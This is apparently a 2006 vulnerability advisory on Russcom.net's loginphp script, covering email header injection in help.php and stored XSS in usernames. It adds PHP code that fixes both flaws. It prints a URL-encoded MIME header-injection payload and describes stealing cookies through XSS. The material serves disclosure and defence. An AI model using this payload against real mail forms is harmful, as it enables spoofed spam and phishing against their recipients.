Russcom.net Loginphp multiple vulnerabilities

Discovered by: Nomenumbra
Date: 5/2/2006
Impact: moderate (privilege escalation, possible defacement)

Russcom.net's loginphp script is a small user management script:
Users can sign up for a username which they can use to log in to the password-protected main page.
The administrator can delete users. He can also edit the main page.
This script includes the members and help pages.

It is possible to send spoofed mails in MIME format through help.php due to improper filtering:

The PHP mail function is used like:

mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]);

By following the rules provided in RFC 822 we can inject a message in MIME format like this:

haxor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A
My%20Message.%0A--frog--

to get this message:

To: recip@ient.xxx
Subject: Visit www.website.xxx !
From: haxor@attack.xxx
Content-Type:multipart/mixed; boundary=frog;
--frog
Content-Type:text/html

My Message.
--frog--

Hello,
A friend thought you might want to see this page : www.website.xxx.
Bye Bye

for more information: http://www.securephpwiki.com/index.php/Email_Injection
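The injection above works because a user-supplied address is concatenated into the extra-headers argument of mail() without rejecting line breaks, so the %0A sequences end the From: header and start new MIME headers. The following is an added example, not Russcom.net's loginphp code: a hardened version of the "tell a friend" mailer the sample message implies (the form, the function names and the "site" parameter are assumptions). It refuses any address or subject containing CR, LF or NUL and validates the address shape before anything reaches the header block.

```php
<?php
// Added example (not Russcom.net's code): hardened tell-a-friend mailer.
// Names and the form layout are hypothetical.

// Returns a validated address, or null if the value is not a bare address
// or contains characters that would terminate a header line.
function safe_email_address(string $value): ?string
{
    // CR, LF and NUL are what let the %0A payload above append
    // Content-Type: and MIME parts after the From: header.
    if (preg_match('/[\x00\r\n]/', $value)) {
        return null;
    }
    $filtered = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $filtered === false ? null : $filtered;
}

// A subject is a single header line: collapse any line breaks to spaces
// and cap the length instead of letting them reach the header block.
function safe_subject(string $value, int $maxLen = 78): string
{
    $oneLine = preg_replace('/[\x00\r\n]+/', ' ', $value);
    return substr($oneLine, 0, $maxLen);
}

// Builds the pieces for mail(); returns null when an input is rejected,
// so the caller never sends a message with a tampered header.
function build_tell_a_friend(string $recipient, string $sender, string $site): ?array
{
    $to   = safe_email_address($recipient);
    $from = safe_email_address($sender);
    if ($to === null || $from === null) {
        return null;
    }
    // $site is a server-side constant in this example, not request input.
    $subject = safe_subject('Visit ' . $site . ' !');
    $body    = "Hello,\nA friend thought you might want to see this page : "
             . $site . ".\nBye Bye\n";
    // Fixed header block: nothing user-controlled follows the From: value.
    $headers = 'From: ' . $from . "\r\n"
             . "Content-Type: text/plain; charset=UTF-8\r\n";
    return ['to' => $to, 'subject' => $subject, 'body' => $body, 'headers' => $headers];
}

function send_tell_a_friend(string $recipient, string $sender, string $site): bool
{
    $parts = build_tell_a_friend($recipient, $sender, $site);
    if ($parts === null) {
        return false;
    }
    return mail($parts['to'], $parts['subject'], $parts['body'], $parts['headers']);
}

// Constructed inputs: the decoded injection string from the advisory and a
// clean address. Only the validators are exercised here; nothing is sent.
$injected = "haxor@attack.com\nContent-Type:multipart/mixed; boundary=frog;\n"
          . "--frog\nContent-Type:text/html\n\nMy Message.\n--frog--";
$clean    = 'recip@ient.xxx';

foreach ([$injected, $clean] as $candidate) {
    $result = safe_email_address($candidate);
    echo json_encode($candidate), ' => ',
         $result === null ? 'rejected' : 'accepted as ' . $result, "\n";
}
```

The check is deliberately two-layered: the explicit CR/LF/NUL test documents the exact failure mode the advisory describes, and FILTER_VALIDATE_EMAIL then rejects anything that is not a single address. Rejecting the request outright is preferable to stripping the offending characters, because a stripped payload may still produce a header the sender did not intend.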

In the register function you can subscribe with the following username (for example):

The input isn't sanitized, so you can insert any XSS (30 char max) and anyone who visits the page displaying
all users will get XSS'd (potentially cookies stolen).
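The stored XSS has two independent fixes, and a defender would apply both: restrict what a username may contain at registration, and encode every username when it is rendered into the user list. The following is an added example, not Russcom.net's code; the function names and the list markup are assumptions, and the 30-character limit is the one stated above.

```php
<?php
// Added example (not Russcom.net's code): allowlisted usernames at
// registration plus output encoding on the page that lists all users.

// Allowlist: 3 to 30 characters, letters, digits and underscore only.
// Characters such as < > " ' / cannot pass, so no markup is ever stored.
function valid_username(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_]{3,30}$/', $name);
}

// Output encoding for any value placed into HTML, applied regardless of
// whether the value was validated on the way in (defence in depth).
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Renders the "all users" listing with every name encoded.
function render_user_list(array $usernames): string
{
    $items = '';
    foreach ($usernames as $name) {
        $items .= '    <li>' . html_escape($name) . "</li>\n";
    }
    return "<ul>\n" . $items . "</ul>\n";
}

// Constructed sample data: one ordinary name and two that carry markup or
// quote characters of the kind the register function currently accepts.
$submitted = ['alice', '<b>bob</b>', 'eve" onclick="x'];

foreach ($submitted as $name) {
    echo $name, ' => ', valid_username($name) ? 'accepted' : 'rejected', "\n";
}

// Even if such names had already been stored before the allowlist existed,
// the listing page renders them as inert text.
echo render_user_list($submitted);
```

The allowlist stops new hostile names from being stored; the encoding step protects against names that were registered before the fix and against any other path by which markup might reach the database. Neither check on its own is sufficient: validation alone leaves legacy rows exploitable, and encoding alone relies on every template author remembering to call it.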
Nomenumbra/[0x4F4C]